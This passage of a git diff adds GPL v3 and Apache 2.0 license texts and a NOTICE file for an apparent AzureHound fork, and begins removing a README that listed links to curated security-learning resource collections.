+ +"The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + +To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + +A "covered work" means either the unmodified Program or a work based +on the Program. + +To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + +To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + +An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + +1. Source Code. + +The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. 
+ +A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + +The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + +The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + +The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + +The Corresponding Source for a work in source code form is that +same work. + +2. 
Basic Permissions. + +All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + +You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + +Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + +3. Protecting Users' Legal Rights From Anti-Circumvention Law. + +No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. 
+ +When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + +4. Conveying Verbatim Copies. + +You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + +You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + +5. Conveying Modified Source Versions. + +You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + +a) The work must carry prominent notices stating that you modified +it, and giving a relevant date. + +b) The work must carry prominent notices stating that it is +released under this License and any conditions added under section +7. This requirement modifies the requirement in section 4 to +"keep intact all notices". + +c) You must license the entire work, as a whole, under this +License to anyone who comes into possession of a copy. This +License will therefore apply, along with any applicable section 7 +additional terms, to the whole of the work, and all its parts, +regardless of how they are packaged. 
This License gives no +permission to license the work in any other way, but it does not +invalidate such permission if you have separately received it. + +d) If the work has interactive user interfaces, each must display +Appropriate Legal Notices; however, if the Program has interactive +interfaces that do not display Appropriate Legal Notices, your +work need not make them do so. + +A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + +6. Conveying Non-Source Forms. + +You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + +a) Convey the object code in, or embodied in, a physical product +(including a physical distribution medium), accompanied by the +Corresponding Source fixed on a durable physical medium +customarily used for software interchange. 
+ +b) Convey the object code in, or embodied in, a physical product +(including a physical distribution medium), accompanied by a +written offer, valid for at least three years and valid for as +long as you offer spare parts or customer support for that product +model, to give anyone who possesses the object code either (1) a +copy of the Corresponding Source for all the software in the +product that is covered by this License, on a durable physical +medium customarily used for software interchange, for a price no +more than your reasonable cost of physically performing this +conveying of source, or (2) access to copy the +Corresponding Source from a network server at no charge. + +c) Convey individual copies of the object code with a copy of the +written offer to provide the Corresponding Source. This +alternative is allowed only occasionally and noncommercially, and +only if you received the object code with such an offer, in accord +with subsection 6b. + +d) Convey the object code by offering access from a designated +place (gratis or for a charge), and offer equivalent access to the +Corresponding Source in the same way through the same place at no +further charge. You need not require recipients to copy the +Corresponding Source along with the object code. If the place to +copy the object code is a network server, the Corresponding Source +may be on a different server (operated by you or a third party) +that supports equivalent copying facilities, provided you maintain +clear directions next to the object code saying where to find the +Corresponding Source. Regardless of what server hosts the +Corresponding Source, you remain obligated to ensure that it is +available for as long as needed to satisfy these requirements. + +e) Convey the object code using peer-to-peer transmission, provided +you inform other peers where the object code and Corresponding +Source of the work are being offered to the general public at no +charge under subsection 6d. 
+ +A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + +A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + +"Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + +If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. 
But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + +The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + +Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + +7. Additional Terms. + +"Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + +When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. 
+ +Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + +a) Disclaiming warranty or limiting liability differently from the +terms of sections 15 and 16 of this License; or + +b) Requiring preservation of specified reasonable legal notices or +author attributions in that material or in the Appropriate Legal +Notices displayed by works containing it; or + +c) Prohibiting misrepresentation of the origin of that material, or +requiring that modified versions of such material be marked in +reasonable ways as different from the original version; or + +d) Limiting the use for publicity purposes of names of licensors or +authors of the material; or + +e) Declining to grant rights under trademark law for use of some +trade names, trademarks, or service marks; or + +f) Requiring indemnification of licensors and authors of that +material by anyone who conveys the material (or modified versions of +it) with contractual assumptions of liability to the recipient, for +any liability that these contractual assumptions directly impose on +those licensors and authors. + +All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. 
+ +If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + +Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + +8. Termination. + +You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + +However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + +Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + +Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + +9. Acceptance Not Required for Having Copies. + +You are not required to accept this License in order to receive or +run a copy of the Program. 
Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + +10. Automatic Licensing of Downstream Recipients. + +Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + +An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + +You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + +11. Patents. 
+ +A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + +A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + +Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + +In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. 
+ +If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + +If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + +A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. 
You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + +Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + +12. No Surrender of Others' Freedom. + +If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + +13. Use with the GNU Affero General Public License. + +Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. 
The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. + +14. Revised Versions of this License. + +The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. + +If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + +Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + +15. Disclaimer of Warranty. + +THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. 
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + +16. Limitation of Liability. + +IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + +17. Interpretation of Sections 15 and 16. + +If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + +END OF TERMS AND CONDITIONS + +How to Apply These Terms to Your New Programs + +If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + +To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. 
+ + +Copyright (C) 2024 Sulaiman A + +This program is free software: you can redistribute it and/or modify +it under the terms of the GNU General Public License as published by +the Free Software Foundation, either version 3 of the License, or +(at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program. If not, see [gnu](http://www.gnu.org/licenses/). + +Also add information on how to contact you by electronic and paper mail. + +If the program does terminal interaction, make it output a short +notice like this when it starts in an interactive mode: + +AzureHoundAD Copyright (C) 2017 - 2024 | byt3n33dl3 ( Sulaiman ) - Leader of GangstaCrew + +This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. +This is free software, and you are welcome to redistribute it +under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, your program's commands +might be different; for a GUI interface, you would use an "about box". + +You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU GPL, see +[gnu](http://www.gnu.org/licenses/). + +The GNU General Public License does not permit incorporating your program +into proprietary programs. If your program is a subroutine library, you +may consider it more useful to permit linking proprietary applications with +the library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. 
But first, please read +[lgpl](http://www.gnu.org/philosophy/why-not-lgpl.html). diff --git a/LICENSE.txt b/LICENSE.txt new file mode 100644 index 0000000..63c2d21 --- /dev/null +++ b/LICENSE.txt 
@@ -0,0 +1,201 @@
+Apache License
+ Version 2.0, January 2004
+ www.apache.org/licenses
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "{}"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright 2024 @byt3n33dl3 (Sulaiman A)
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
\ No newline at end of file
diff --git a/NOTICE.md b/NOTICE.md
new file mode 100644
index 0000000..f94683b
--- /dev/null
+++ b/NOTICE.md
@@ -0,0 +1,15 @@
+Copyright (C) 2024 The @byt3n33dl3
+Copyright (C) 2022 The BloodHound Enterprise Team
+
+AzureHound is free software: you can redistribute it and/or modify
+it under the terms of the GNU General Public License as published by
+the Free Software Foundation, either version 3 of the License, or
+(at your option) any later version.
+
+AzureHound is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with this program. If not, see [www.gnu.org](https://www.gnu.org/licenses/).
diff --git a/README.md b/README.md
index d685120..1c5d5f5 100644
--- a/README.md
+++ b/README.md
@@ -1,100 +1,91 @@
-

- -

- -**A collection of awesome lists for hackers, pentesters & security researchers.** - -Your contributions are always welcome ! - -## Awesome Repositories - -Repository | Description ----- | ---- -[Android Security](https://github.com/ashishb/android-security-awesome) | Collection of Android security related resources -[AppSec](https://github.com/paragonie/awesome-appsec) | Resources for learning about application security -[Asset Discovery](https://github.com/redhuntlabs/Awesome-Asset-Discovery) | List of resources which help during asset discovery phase of a security assessment engagement -[Bug Bounty](https://github.com/djadmin/awesome-bug-bounty) | List of Bug Bounty Programs and write-ups from the Bug Bounty hunters -[Capsulecorp Pentest](https://github.com/r3dy/capsulecorp-pentest) | Vagrant+Ansible virtual network penetration testing lab. Companion to "The Art of Network Penetration Testing" by Royce Davis -[CTF](https://github.com/apsdehal/awesome-ctf) | List of CTF frameworks, libraries, resources and softwares -[Cyber Skills](https://github.com/joe-shenouda/awesome-cyber-skills) | Curated list of hacking environments where you can train your cyber skills legally and safely -[DevSecOps](https://github.com/devsecops/awesome-devsecops) | List of awesome DevSecOps tools with the help from community experiments and contributions -[Embedded and IoT Security](https://github.com/fkie-cad/awesome-embedded-and-iot-security) | A curated list of awesome resources about embedded and IoT security -[Exploit Development](https://github.com/FabioBaroni/awesome-exploit-development) | Resources for learning about Exploit Development -[Fuzzing](https://github.com/secfigo/Awesome-Fuzzing) | List of fuzzing resources for learning Fuzzing and initial phases of Exploit Development like root cause analysis -[Hacking](https://github.com/carpedm20/awesome-hacking) | List of awesome Hacking tutorials, tools and resources -[Hacking 
